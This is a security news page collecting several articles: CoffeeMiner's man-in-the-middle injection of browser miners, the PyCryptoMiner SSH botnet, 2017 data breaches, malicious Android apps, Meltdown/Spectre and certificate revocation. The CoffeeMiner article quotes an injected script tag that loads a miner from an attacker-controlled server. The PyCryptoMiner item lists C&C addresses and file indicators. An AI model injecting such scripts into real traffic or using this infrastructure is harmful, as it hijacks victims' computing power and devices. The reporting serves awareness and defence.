Saturday, May 3, 2025
Home Blog Page 909

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners

Cryptocurrency Miners are in the raise starting from last year, more than 500 million computers are mining cryptoCurrency in their browsers without the user’s knowledge.

A developer named Arnau published the CoffeeMiner script which intercepts the traffic between the users and the routers to inject scripts into HTML pages.

Arnau published a PoC explaining how a MITM attack performed (Man(Person)-In-The-Middle) to inject some javascript in the HTML pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.

Attack Scenario – CoffeeMiner

CoffeeMiner employees ARPspoofing(used for resolving network layer address (IP) into link layer address (MAC)) for spoofing messages onto a local area network.

Also Read Xerosploit – Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks

The mitmproxy used to analyze the traffic flow and to edit the traffic data. Here he injected a line of code into HTML pages that call the javascript cryptocurrency miner which is deployed in the in the attacker machine.

Injected Code

<script src=”http://httpserverIP:8000/script.js”></script>

Arnau used CoinHive javascript miner, “Coinhive offers a JavaScript miner for the Monero Blockchain that can be embedded into other Websites. The users run the miner directly in their Browser and mine XMR for the site owner in turn for an ad-free experience, in-game currency or whatever incentives they are availing to their users/visitors”.

He set up a Virtual box environment to demonstrate this and also published PoC video.

Now the CoffeeMiner works only with HTTP version and not with HTTPs, Arnau said he will be adding sslstrip to inject with HTTPS sites and autonomous Nmap scan, to add the IPs detected to the CoffeeMiner victim’s list.

The complete source code of CoffeeMiner published in GitHub.

PyCryptoMiner – A New Linux Crypto-miner Botnet Spreading over the SSH Protocol to Mining Monero

Highly Sophisticated Python Script Based Linux Crypto-miner botnet called PyCryptoMiner abusing SSH port and targeting Linux users to mining Monero CryptoCurrency.

Its written in python language which is difficult to detect and this botnet crypto-miner uses over 36,000 domains that is related to scams, gambling, and adult services.

This Crypto miner mainly focusing on mining Monero and till December researchers estimated that it has made approximately US $46,000 mining Monero.

If original command and control server become unreachable then it leverages Pastebin.com/WHATHAPPEN to receive C&C Server Assignment.

Current crypto mining malware is mainly using scripts which are very obfuscated, easily evade the detection and also very difficult to detect by nature.

Also Read: Chrome Extension Caught Silently Mining CryptoCurrency without Users Knowledge

How does this Linux Crypto-miner Works

This Crypt-miner botnet using brute forcing attack to guess SHH login credentials of the Linux machine.

Before connected it to command and control server it deploys the base64-encoded spearhead Python script and executing Obfuscated spearhead Python script.

Most of the cases malware hardcoded with the command & control server, so once it’s taken down it won’t be get connected to another C&C server.

But here attacker using Pastebin.com as an alternative one if original C&C sever goes down.

According to F5 Networks, Being exposed as a public Pastebin.com resource allowed us also to discover more information about this operation. It seems to have been running since at least August of this year because the username “WHATHAPPEN” created the resource on Aug. 21, 2017.

This pastbin.com resource is continuously accessing when original C&C Server goes down and this resource had been viewed 177,987 times.

Its execution flow starts by executing the spearhead Python script it leads to fetching base64-encoded Python script and executed from the C&C server.

It will be the main controller of the of the infected machine which is act as a botnet and The original spearhead bash script named httpsd includes a base64-encoded Python one-liner that runs every 6 hours.

its used to collect  Host/DNS name, OS name and its architecture, Number of CPUs, CPU usage once its take over the target machine.

Discovered  2 pool address which is used by this botnet were paid approximately 94 and 64 Monero which is around  $60,000 USD.

IOCs

Hash

d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d

C&C

hxxp://pastebin.com/raw/yDnzKz72

hxxp://pastebin.com/raw/rWjyEGDq

hxxp://k.zsw8.cc:8080 (104.223.37.150)

hxxp://i.zsw8.cc:8080 (103.96.75.115)

hxxp://208.92.90.51

hxxp://208.92.90.51:443

hxxp://104.223.37.150:8090

Infected Machine

/tmp/VWTFEdbwdaEjduiWar3adW

/bin/httpsd

/bin/wipefs

/bin/wipefse

/bin/minerd

/bin/webnode

/bin/safenode

/tmp/tmplog

Top 10 Biggest Data Breaches Of 2017

Top 10 Biggest Data Breaches Of 2017

Last year many cyber incidents were reported. Here is the lookback of Top 10 Biggest Data Breaches and leaks reported in 2017 which made a huge impact on the organizations.

Here we have listed Top 10 Biggest Data Breaches which costs companies in million dollars and loss in reputation.

Also Read:  TOP 10 Cyber Attacks and Critical Vulnerabilities of 2017

1. Equifax

Hackers had breached the company’s system and accessed people’s names, Social Security numbers, birth dates, addresses and, in some instances, driver’s license numbers.

They also stole credit card numbers for about 209,000 people and dispute documents with personal identifying information for about 182,000 people.

2. Yahoo

Yahoo announced that all user accounts were affected in the August 2013 theft. Previously they announced that “more than one billion user accounts” may have been stolen by hackers during the attack that took place in August 2013.

Leaked details still remain secret, besides the range of affected users and that hackers stole names, email addresses, date of birth, phone numbers, hashed passwords, safety questions and answers.

3. American Households

A massive database that contains 123 Million American households sensitive personal information leaked online by California-based data analytics firm.

An unsecured cloud-based data repository was left publicly due to the bad misconfiguration in Amazon Web Services S3 cloud storage and the repository are massive data sets belonging to consumer credit reporting agency Alteryx partner Experian.

4. Accenture Data Leak

An Unsecured Server Hosted on Amazon’s S3 storage service which is holding 137 gigabytes of Customer data has completely left unsecured which Could be affected tons Accenture Cloud Platform Customer Sensitive Data.

Exposed Cloud Data servers belong to Accenture’s enterprise cloud offering, Accenture Cloud Platform, a “multi-cloud management platform” that is used for Accenture Customers.

5. Uber Data Breach

Uber data Breach, Hackers stole 57 million Uber users around the world and 600,000 drivers names including their license numbers.

The breach took place in October 2016 and the leaked data includes names, email addresses and mobile phone numbers that related to Uber accounts.

6 .California Voter Database Exposed

An unprotected MongoDB database contains a large volume of data which belongs to California state voters information exposed online. It can be accessed by anyone by having the just simple internet connection and the database named as ‘cool_db’.

Also, it was open to view, edit and modifying the entire database by anyone which contains 2 collections of the database.

one collection contains set of voter registration data and other collections contain entire California state voters that are holding 19,264,123 records, all open for public access.

7. Malaysian Data Breach

Malaysian’s Biggest Data Breach Exposed around 46.2 Million Mobile phone numbers have been leaked online from Malaysian telecoms and mobile virtual network operators (MVNO).

The information that has got out includes postpaid and prepaid numbers, customer details, addresses, IMEI and IMSI numbers.

8 .Verizon Data Breach

Telecommunications giant Verizon’s Customers 6 Million Sensitive personal data leaked online due to misconfigured cloud-based file repository and this Misconfiguration leads to exposed customer phone numbers, names, and some PIN codes publicly available online.

This Data Breach occurred due to “Human Error” and  Verizon’s Cloud-based file server was operated by Verizon’s Third Party vendor  NICE Systems.

9. Pentagon’s Data Leak

Pentagon Data Leak, Amazon Web Services S3 cloud storage buckets that contain social media surveillance data configured in the way that users with free AWS account can read and download the contents.

Leaked data consist of billions of public internet posts, news commentary and other writings from individuals from the US and other Countries.

10. Ai.Type keyboard Cata Breach

Millions of customer personal data exposed online due to a Misconfiguration with MongoDB that belongs to Ai.Type, the company that well know for developing the personalized virtual keyboard app for Android and iOS.

the company exposed their entire 577GB Mongo-hosted in public, anyone with internet connection can access the database.

36 Malicious Android Apps Removed From Google Play Store that Mimics as Famous Security Tools

36 Malicious Android Apps Removed From Google Play Store that Mimics as Famous Security Tools

Several malicious Android Apps removed from Google play store that posed as legitimate security tools and different category of android apps.

Exactly 36 apps are listed in this category that has actually performed similar tasks and also its performing dangerous activities such as secretly harvested user data, tracked user location, and aggressively pushed advertisements.

These 36 apps mimic under legitimate apps such as  Security Defender, Security Keeper, Smart Security, Advanced Boost, and more.

they have to advertise some of the futures including scanning, cleaning junk, saving battery, cooling the CPU, locking apps, as well as message security, WiFi security.

Also Read: LightsOut – Malicious Flashlight Apps on Google Play with Nearly 7.5 Million Downloads

How does this malicious Android Apps Works

Once it installed by the users, Apps will appear neither device launcher’s list of applications nor shortcuts in device screen.

so users can able to see only the notification security warnings and pop-up windows to the users.

These app designed for explicitly hide for the different type of Specific mobile devices such as LG, Xiaomi, Nexus, ZTE N958St etc.

So these malware’s are not doing any specific task in the above-listed mobile model’s and also malware authors designed this to evade the google play store security scan.

Security tools related malicious apps that listed within this 36 apps are showing fake scanning result to intimate to users that they are infected with some kind of malware.

But accroiding to the Trend Micro report,  we found that most detection results from the notifications are false. For example, if the user installs another app, then it will immediately be reported as suspicious. Or the user will be sent notifications like “10.0 GB files are being wasted,” which will prompt some kind of action.
But the data shown in these messages are fake — they are just used to add a layer of legitimacy to the app.

Also, malware authors designed these apps to make users believe that they are actually infected by some kind of vulnerability by showing some of the animation with some vulnerability name.

Once its gains the user information, it is also able to collect the victim’s private data, including specific location details, and send them to a remote server.

Also, it shows many different advertisements, aggressive ads show up during many different scenarios.

All the malicious apps have been reported to Google and all the apps were removed from the Google Play Store.

LightsOut – Malicious Flashlight Apps on Google Play with Nearly 7.5 Million Downloads

36 Malicious Android Apps Removed From Google Play Store that Mimics as Famous Security Tools

A new adware spotted in Google play contains scripts to overrides the user decision and disable ads outside of legitimate context. It hides icon which makes the detection and removal process difficult.

The malware Dubbed LightsOut spotted by checkpoint security researchers and notified to Google, who removed the apps from the play store now.The Malware hides into 22 utility and flashlight apps which almost reaches 7.5 million downloads.

Researchers said The deception was far-reaching in its disruption to the user. Some users noted that they were forced to press on ads to answer calls and perform other activities on their device. Indeed, another user reported that the malicious ad activity continued even after he purchased the ad-free version of the app, taking the abuse to a whole new level.

How it works and it’s purpose – LightsOut

It embeds the malicious SDK file into the legitimate Flashlight and utility apps, researchers found multiple malicious capabilities with the samples analyzed.

Also Read New Android Malware Physically Destroying your Phone by Running Cryptocurrency Miner

The app once launched hides its icon which makes harder for the user to halt the process to remove the app. it offers a control panel to enable or disable services, including the option to disable ads.

Even though users choose to disable ads ‘LightsOut’ overrides it and continues to display the ads out of context.The purpose of the ads is to generate illegal revenue from users.The ad events triggered at the end of the call, Wi-Fi connection, when charger plugged in or the screen is locked.

Researchers said since the ads are not directly connected to ‘LightsOut’s activity, the user is unlikely to understand what caused them. And, even if they do realize the app is to blame, they won’t be able to find the app’s icon and remove it from their device.

Infected Packages on Play store

Package NameDownloads (Min)Downloads (Max)
com.smart.swipe.whitedot50,000100,000
com.wifi.network.realtime10,00050,000
pro.filetrans.app5,00010,000
com.network.guard.tool1,0005,000
com.brightest.ledflashlight1,0005,000
com.arc.voice.recorder.pro1,0005,000
pro.freewifi.password10,00050,000
com.call.recorder.pro100,000500,000
com.solidunion.callrecorder1,000,0005,000,000
com.realtime.app.cleaner10,00050,000
com.nfl.flashlight5,00010,000
hd.background.wallpaper.theme100,000500,000
com.ledflashlight.cool10,00050,000
com.master.wifikey.booster100,000500,000
com.wifimaster.network.speedtest50,000100,000
com.freewifi.connect.booster100,000500,000
com.brightest.ledflashlight.almighty5,00010,000
com.brightest.ledflashlight.best10,00050,000
rec.call.recording.manager1,0005,000
com.smart.freewifi.booster1,0005,000
com.brightest.ledflashlight.pro10,00050,000
com.dr.clean.lite5,00010,000
Total1,585,0007,565,000

SHA-256 Hashes:

f5b98f91c4ccb6f9530434adce285e25e503a7afb6ea97a03bea57c319cd2fbc 52209fa52052b8086ae5213d0a51c053ca07a6f36a131f2627be55db17f39ae7

U.S Department of Homeland Security Data Breach Affected 246,167 Federal Government Employees

U.S Department of Homeland Security Data Breach Affected  246,167 Federal Government Employees

DHS Office of Inspector General Case Management System Privacy incidents revealed 246,167 Federal Government Employees personal sensitive information and DNS believes that this cyber-attack not by external actors.

This incident exposed PII for these individuals includes names, Social Security numbers, dates of birth, positions, grades, and duty stations.

Data breach impact has been only affected the employees if they were employed by DHS in 2014 or associated with a DHS OIG investigation from 2002 through 2014.

This unauthorized Activities found On May 10, 2017, when DHS Conduct a criminal investigation being conducted by DHS OIG and the U.S.

During this investigation, DHS OIG discovered an unauthorized copy of its investigative case management system in the possession of a former DHS OIG employee.

Also Read: TOP 10 Cyber Attacks and Critical Vulnerabilities of 2017

According to the Evidence, affected individual’s personal information was not the primary target of the unauthorized transfer of data.

This Incident has been identified in 2 group category.first group incident consists of approximately 247,167 current and former federal employees that were employed by DHS in 2014.
The second group is comprised of individuals (i.e., subjects, witnesses, and complainants) associated with DHS OIG investigations from 2002 through 2014 (the “Investigative Data”).

Based on the DHS investigation evidence this Personal information was not a primary target for the exfiltration.

In this case, DNS offered  18 months of free credit monitoring and identity protection services for all the individuals potentially affected by this privacy incident.

This service entails credit monitoring and a $1 million identity theft insurance policy and another Identity repair Policy is intended to address issues related to credit restoration or recovery of financial losses.

DNS Chief Privacy officer Philip S. Kaplan said, DHS is implementing additional security precautions to limit which individuals have access to this information and will better identify unusual access patterns.

We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network.

Dangerous Android Malware Targets 232 Banking Apps (Axis,HDFC,SBI,ICICI) and Cryptocurrency Apps

Dangerous Android Malware Targets 232 Banking Apps (Axis,HDFC,SBI,ICICI) and Cryptocurrency Apps

A new Android banking Trojan identified targeting more that 232 mobile banking apps and major Indian banks mobile app.

The malware detected by Quick Heal as Android.banker.A2f8a. It is distributed through third-party stores via a fake flash player app and through the play store.

It’s targeting Banking apps,Crypto currency apps and other financial apps that belongs to Amazon Shopping, Airbnb, Poker Stars etc.

Malware designed as like any another banking malware and it has the following capabilities.

  • Display an overlay of legitimate apps to steal credentials.
  • Uploading contacts lists and SMS to MAlicious C&C servers.
  • Hijacking SMS(checking foP responses)

Android Malware Infection

If the app installed it throws successive popups until it gets admin rights, even if the user kills the process. Once it obtains permission form user it hides the app and carryout malicious tasks.

It checks for the targeted apps in the phone and if it finds any targeted apps it shows the fake popup on behalf of the targeted banking app and if user clicks on it then shows a fake login screen requesting login details.

According to Quick Heal researchers, the malware is capable of performing following commands from the C&C server.

Send_GO_SMSSend an SMS
GetSWSGOCollect all SMS from the device
nymBePsG0Upload list of contacts to a malicious server
telbookgotextSend SMS to all contacts with the text from its command
StartAutoPushShow fake notification
RequestPermissionInjACCESSIBILITY Permission
RequestPermissionGPSGPS Permission
killBotSet all URLs null in Shared Preferences
getIPUpload location to a malicious server
ussdSend a USSD request

It shows a fake notification with title “Urgent message!” & text: “Confirm your account” if the user clicked on the notification it takes to the login page. Also, the malware silences the phone, hijacks SMS for OTP details and capable of send SMS. Quick heal published the Technical analysis.

List of Mobile banking Apps that targeted in India

axis.mobile (Axis Mobile)
sap work.hdfc (HDFC Bank MobileBanking)
sbi.SBIFreedomPlus (SBI Anywhere Personal)
hdfcquickbank (HDFC Bank MobileBanking LITE)
csam.icici.bank.imobile (iMobile by ICICI Bank)
snapwork.IDBI (IDBI Bank GO Mobile+)
idbibank.abhay_card (Abhay by IDBI Bank Ltd)
com.idbi (IDBI Bank GO Mobile)
idbi.mpassbook (IDBI Bank mPassbook)
co.bankofbaroda.mpassbook (Baroda mPassbook)
unionbank.ecommerce.mobile.android (Union Bank Mobile Banking)
unionbank.ecommerce.mobile.commercial.legacy (Union Bank Commercial Clients )

Popular Targeted Shopping Apps

amazon.mShop.android.shopping (Amazon Shopping)
amazon.windowshop (Amazon for Tablets)
eBay.mobile (eBay: Buy & Sell. Explore Discount Shopping Deals)
airbnb.android (Airbnb)
scores365 (365Scores: Sports Scores Live)

IoC of Attack

App Name: Flash Player
Package name: yqyJqWdtdf.UOaOrquyRDgLFgGueha
MD5: 29cf5cc309c2e29b6afd63eb5ab8fbd2
Size: 115 KB

Common Defences On Mobile Threats

Give careful consideration to the permission asked for by applications.
Download applications from trusted sources.
Stay up with the latest version.
Encrypt your devices.
Make frequent backups of important data.
Install anti-malware on their devices.
Stay strict with CIA Cycle.

Nearly Every CPU’s Since 1995 are Vulnerable to “Meltdown” and “Spectre” Attacks

Nearly Every CPU’s Since 1995 are Vulnerable to “Meltdown” and “Spectre” Attacks

A critical vulnerability published by Google which affects almost all the processors since 1995, the vulnerability resides in “speculative execution” a technique used by modern processors for processor optimization.

The hardware bugs Meltdown and Spectre allows an attacker to steal the data that currently processed on the computer it includes the process of personal photos, Emails, Password manager, instant messages and sensitive documents.

Security researchers from Google Project Zero discovered the vulnerability and it is similar to the bug reported in Intel Processors. Programs are not allowed to read other programs, Researchers says “a malicious program can exploit Meltdown and Spectre to get hold of secrets stored in the memory of other running programs”.

What is Meltdown and Spectre

Meltdown breaks the separation between the user accounts and the operating systems, it allows access to the memory where attacker extract secret information from other programs and operating systems.

It breaks all security assumptions given by address space isolation as well as para-virtualized environments and, thus, every security mechanism building upon this foundation.There is no software vulnerability involved in Meltdown.

Spectre breaks the isolation between the applications, it allows an attacker to trick legitimate applications into leaking their secrets.

Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during correct program execution and which leak the victim’s confidential information via a side channel to the adversary.

Devices Affected

The attack works on mobile devices, personal computers and cloud infrastructure depends on the cloud providers.

Antivirus won’t detect as like malware and it may detect may detect malware which uses the attacks by comparing binaries after they become known.

Meltdown affects Desktop, Laptop, and Cloud computers, it affects every processor starting from 1995 except Intel Itanium and Intel Atom before 2013. Researchers tested the exploits only with Intel processors at this time where as ARM and AMD processors are not tested.

Spectre affects Laptops, Smartphones, Desktops and Cloud Servers, it affects all the modern processors which keeps data on the flight, they have Intel, AMD, and ARM processors.

CVE in Reference

CVE-2017-5753 and CVE-2017-5715 are the references to Spectre, CVE-2017-5754 is for Meltdown Mitigation Spectre can be mitigated if speculative execution can be halted on potentially sensitive execution paths.

serialization instructions may not be an effective countermeasure on all processors or system configurations.

Intel Processors Vulnerability Allows Normal User Programs To Access The Protected Memory in the Kernel

Intel Processors Vulnerability Allows Normal User Programs To Access The Protected Memory in the Kernel

Intel Processors Critical hardware design flaw that Presented in kernel level mode has been affected both Windows and Linux Kernels which leads to abuse the most sensitive kernel level privileges by Attackers.

This Critical Kernal vulnerability affected all operating systems including Windows, Linux, macOS which leads to slow down the process atleast five to 30 percentage.

It is presented in all recent Intel Processors and significantly allows normal users to access the protected memory in the kernel.

The kernel inside a chip is basically an invisible process that facilitates the way apps and functions work on your computer.

It has complete control over your operating system. Your PC needs to switch between user mode and kernel mode thousands of times a day.

This Critical vulnerability existing in Intel x86 CPUs produced over the past 10 years and initially, this flaw reported only in Intel Based chips

But Intel responded that these exploits are caused by a “bug” or a “flaw” and are unique to Intel products are incorrect. Based on the analysis to date, many types of computing devices — with many different vendors’ processors and operating systems — are susceptible to these exploits.

Also Read: phpMyAdmin CSRF Vulnerability Allows An Attacker to Delete Records From Database

What is the Major Impact of this Kernel Vulnerability

This Kernel Vulnerability categorized as an extremely technical flaw in the kernel which affected in not only the Intel-based processors but other vendors such as AMD, ARM also affected.

In this flaw allows chip’s kernel is leaking memory that could be accessed by user mode priviaged users can interact with kernel and sensitive data can be exposed by attackers.

Even more, an attacker can able to install the normal program on the computer and later they can read the password that is stored in kernel memory that has been encrypted with the private key.

Since a kernel is the core of an operating system, It’s a process that handles the most sensitive tasks in your system. so it considered as one of the serious flaws that should be fixed by the operating systems vendors and hardware vendors.

Intel said Intel and other technology companies have been made aware of new security research describing software analysis methods that, when used for malicious purposes, have the potential to improperly gather sensitive data from computing devices that are operating as designed,”

“Intel believes these exploits do not have the potential to corrupt, modify or delete data.” AMD  denied that its chips are affected.

According toThe Rigister, A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
Programmers are scrambling to overhaul the open-source Linux kernel’s virtual memory system. Meanwhile, Microsoft is expected to publicly introduce the necessary changes to its Windows operating system in an upcoming Patch Tuesday.

Since its a highly technical security Kernel Vulnerability users cannot perform any mitigation.so all the users urged to check with your operating system vendor or system manufacturer and apply any available updates as soon as they are available.

SSL/TLS Certificate Revocation is Broken Time for More Reliable Revocation Checking Mechanism

SSL/TLS Certificate Revocation is Broken Time for More Reliable Revocation Checking Mechanism

We are moving fast to the encrypted world and the usage of TLS certificates increased dramatically.Security researcher Scott Helme discovered a way to break Certificate Revocation Checking Mechanism.

The process of getting a certificate has become more and more simple over time and now and it also free to get them.

In order to get a certificate, we should send a Certificate Signing Request (CSR) to the Certificate Authority (CA) and the CA will challenge us to prove our ownership of the domain. This is usually done by setting a DNS TXT record or Email based.

Once it has been satisfied CA will issue a certificate for you and then it needs to be installed on the server where our domain hosted to get green padlock and HTTPS in the address bar.

Public and Private keys

The certificates that we are using for HTTPS are public documents, we send them to anybody that connects to our site, however, the thing that stops other individuals utilizing our certificate is that they don’t have our private key. When a browser establishes a secure connection to a site, it checks that the server has the private key for the certificate it’s trying to use, this is no one can use our certificate. If an attacker gets our private key though, then it changes things.

When a browser establishes a secure connection to a site, it checks that the server has the private key for the certificate it’s trying to use, this is no one can use our certificate. If an attacker gets our private key though, then it changes things.

If some attacker steals your private key then they can prove that they are us. There are a number of ways that private keys are revealed by accident or carelessness.

Hope you remember Heartbleed, a small flaw with OpenSSL which allows attackers to steal your private key and you didn’t need to do anything mistakenly for it to happen.

If private key exposes then the only way to stop the attacker is by revoking the certificate by contacting CA Authority.

Certificate revocation

Once your certificate so that an attacker can’t abuse it. Once a certificate is marked as revoked the browser will know not to trust it, even though it’s valid. The owner has requested revocation and no client should accept it.

When we know we’ve had a compromise we contact the CA and ask that they revoke our certificate. We need to prove ownership of the certificate in question and once we do that, the CA will mark the certificate as revoked.

Browser doesn’t aware that certificate is revoked which is the problem and it will be sorted out with these two mechanism Certificate Revocation List (CRL) or the Online Certificate Status Protocol (OCSP).

Certificate Revocation Lists

A Certificate Revocation List (CRL) is a list of certificate serial numbers which have been revoked, are not any more legitimate, and should not be relied upon by any system user.

A CRL is generated periodically, the CRL is always issued by the CA which issues the corresponding SSL certificates. All CRLs have an (often short) lifetime in which they are valid and in which they may be consulted by a PKI-enabled application to verify a counterpart’s certificate prior its use.

To counter spoofing or denial-of-service attacks, CRLs are usually signed by the issuing CA and therefore carry a digital signature.

The problem with a CRL is that they contain a lot of revoked certificates from the particular CA. The other problem is that if the client doesn’t have a fresh copy of the CRL, it has to fetch one during the initial connection to the site which can make things look much slower than they actually are.

Online Certificate Status Protocol

The Online Certificate Status Protocol (OCSP) is an Internet convention utilized for acquiring the renouncement status of an X.509 computerized certificate.With OCSP we approach the CA for the status of a solitary, specific authentication.

This implies all the CA needs to do is react with a decent/renounced answer which is extensively littler than a CRL.

Truly OCSP offered a huge execution advantage over getting a CRL, When you send an OCSP request, you’re basically asking the CA this:

Is the certificate for gbhackers.com valid?

Hard Fail

Upon receiving the certificate, the browser will reach out to one of these services and perform the necessary query to ultimately ascertain the status of the certificate. What if your CA is having a bad day and the infrastructure is offline? What if it looks like this?

The browser has only two choices here. It can refuse to accept the certificate because it can’t check the revocation status or it can take a risk and accept the certificate without knowing the revocation status.

Both of these options come with their advantages and disadvantages. If the browser refuses to accept the certificate then every time your CA has a bad day and their infrastructure goes offline, your sites go offline too.

If the browser continues and accepts the certificate then it risks using a certificate that could have been stolen and exposes the user to the associated risks. It’s a tough call, but right now, today, neither of these actually happen.

Soft Fail

What actually happens today is that a browser will do what we call a soft-fail revocation check. That is, the browser will try to do a revocation check but if the response doesn’t come back, or doesn’t come back in a short period of time, the browser will simply forget about it.

Even is worse is that Chrome doesn’t even do revocation checks, at all. Yes, you did read that right, Chrome doesn’t even try to check the revocation status of certificates that it encounters.

Firefox looks like they will be joining the party very soon too.The problem we had with hard fail was obvious, the CA has a bad day and so do we, that’s how we arrived at soft fail. The browser will now try to do a revocation check but will ultimately abandon the check if it takes too long or it appears the CA is offline.

If you have an attacker performing a MiTM attack all they need to do is simply block the revocation request and make it look like the CA is offline. The browser will then soft fail the check and continue on to happily use the revoked certificate.

Adam Langley at Google came up with the best description for what revocation is, it’s a seatbelt that snaps in a car crash, and he’s right. You get in your car every day and you put your seatbelt on and it makes you feel all warm and fuzzy that you’re safe. Then, one day, things don’t quite go to plan, you’re involved in a crash and out of the windscreen you go. The one time you needed it, it let you down.

Fixing the problem

Right now at this very moment in time, the truth is that there is no reliable way to fix this problem, revocation is broken. There are a couple of things worth bringing up though and we may be able to look to a future where we have a reliable revocation checking mechanism.

Proprietary mechanisms

If a site is compromised and an attacker gets hold of the private key they can impersonate that site and cause a fair amount of harm. That’s not great but it could be worse. What if a CA was compromised and an attacker got access to the private key for an intermediate certificate?

That would be a disaster because the attacker could then impersonate pretty much any site they like by signing their own certificates. Rather than doing online checks for revocation of intermediate certificates, Chrome and Firefox both have their own mechanisms that work in the same way.

Chrome calls their CRLsets and Firefox call their OneCRL and they curate lists of revoked certificates by combining available CRLs and selecting certificates from them to be included. So, we have high-value certificates like intermediates covered, but what about you and I?

OCSP Must-Staple

To explain what OCSP Must-Staple is, we first need a quick background on OCSP Stapling. I’m not going to go into too much info, you can get that in my blog on OCSP Stapling, but here is the TL;DR.

OCSP Stapling saves the browser having to perform an OCSP request by providing the OCSP response along with the certificate. It’s called OCSP Stapling because the idea is that the server would ‘staple’ the OCSP Response to the certificate and provide both together.

At first glance, this seems a little odd because the server is almost ‘self-certifying’ its own certificate as not being revoked, but it all checks out. The OCSP response is only valid for a short period and is signed by the CA in the same way that the certificate is signed.

So, in the same way the browser can verify the certificate definitely came from the CA, it can also verify that the OCSP response came from the CA too. This solves the massive privacy concern with OCSP and also removes a burden on the client from having to perform this external request.

Winner! But not so much actually, sorry. OCSP Stapling is great and we should all support it on our sites, but, do we honestly think an attacker is going to enable OCSP Stapling? No, I didn’t think so, of course they aren’t going to.

What we need is a way to force the server to OCSP Staple and this is what OCSP Must-Staple is for. When requesting our certificate from the CA we ask them to set the OCSP Must-Staple flag in the certificate.

This flag instructs the browser that the certificate must be served with an OCSP Staple or it has to be rejected. Setting the flag is easy.

Now that we have a certificate with this flag set, we as the host must ensure that we OCSP Staple or the browser will not accept our certificate. In the event of a compromise and an attacker obtaining our key, they must also supply an OCSP Staple when they use our certificate too.

If they don’t include an OCSP Staple, the browser will reject the certificate, and if they do include an OCSP Staple then the OCSP response will say that the certificate is revoked and the browser will reject.

OCSP Expect-Staple

Whilst Must-Staple sounds like a great solution to the problem of revocation, it isn’t quite there just yet. One of the biggest problems that I see is that as a site operator I don’t actually know how reliably I OCSP staple and if the client is happy with the stapled response.

Without OCSP Must-Staple enabled this isn’t really a problem but if we do enable OCSP Must-Staple and then we don’t OCSP Staple properly or reliably, our site will start to break. To try and get some feedback about how we’re doing in terms of OCSP Stapling we can enable a feature called OCSP Expect-Staple.

Expect-Staple: max-age=31536000; report-uri="https://scotthelme.report-uri.io
/r/d/staple"; includeSubDomains; preload

I’ve written about this before and you can get all of the details in the blog OCSP Expect-Staple but I will give the TL;DR here. You request an addition to the HSTS preload list that asks the browser to send you a report if it isn’t happy with the OCSP Staple.

Rogue certificates

One of the other things that we have to consider whilst we’re on the topic of revocation is rogue certificates. If somebody manages to compromise a CA or otherwise obtains a certificate that they aren’t supposed to have, how are we supposed to know?.

If I were to breach a CA right now and obtain a certificate for your site without telling you, you wouldn’t ever learn about it unless it was widely reported. You could even have an insider threat and someone in your organization could obtain certificates without going through the proper internal channels and do with them as they please. We need a way to have 100% transparency and we will very soon, Certificate Transparency.

Certificate Transparency

CT is a new requirement that will be mandatory from early next year and will require that all certificates are logged in a public log if the browser is to trust them. You can read the article for more details on CT but what will generally happen is that a CA will log all certificates it issues in a CT log.

These logs are totally public and anyone can search them so the idea is that if a certificate is issued for your site, you will know about it. CT is a fantastic idea and I can’t wait for it to become mandatory but there is one thing to note and it’s that CT is only the first step. Knowing about these certificates is great but we still have all of the above-mentioned problems with revoking them.

You can also use CertSpotter from sslmate to do the same and I use the Facebook Certificate Transparency Monitoring tool which will send you an email each time a new certificate is issued for your domain/s.

Certificate Authority Authorisation

Stopping a certificate being issued is much easier than trying to revoke it and this is exactly what Certificate Authority Authorisation allows us to start doing. Again, there are further details in the linked article but the short version is that we can now authorize only specific CAs to issue certificates for us instead of the current situation where we can’t indicate any preference at all. It’s as simple as creating a DNS record:

scotthelme.co.uk.    IN  CAA 0 issue "letsencrypt.org"

Whilst CAA isn’t a particularly strong mechanism and it won’t help in all mis-issuance scenarios, there are somewhere it can help us and we should assert our preference by creating a CAA record.

Conclusion

As it currently stands there is a real problem, we can’t revoke certificates if someone obtains our private key. Just imagine how that will play out the next time Heartbleed comes along! One thing that you can do to try and limit the impact of a compromise is to reduce the validity period of certificates you obtain.

Instead of three years go for one year or even less. Let’s Encrypt only issue certificates that are valid for ninety days! With a reduced lifetime on your certificate, you have less of a problem if you’re compromised because an attacker has less time to abuse the certificate before it expires. Beyond this, there’s very little we can do.

Note: This article was originally published in Scott Helme blog. All the Content of this Article Belongs to Original Author Scott Helme. GBHackers on Security won’t take any credits. This article has been  Published with all the Appropriate Permission. Credits $ Source are Belongs to Scott Helme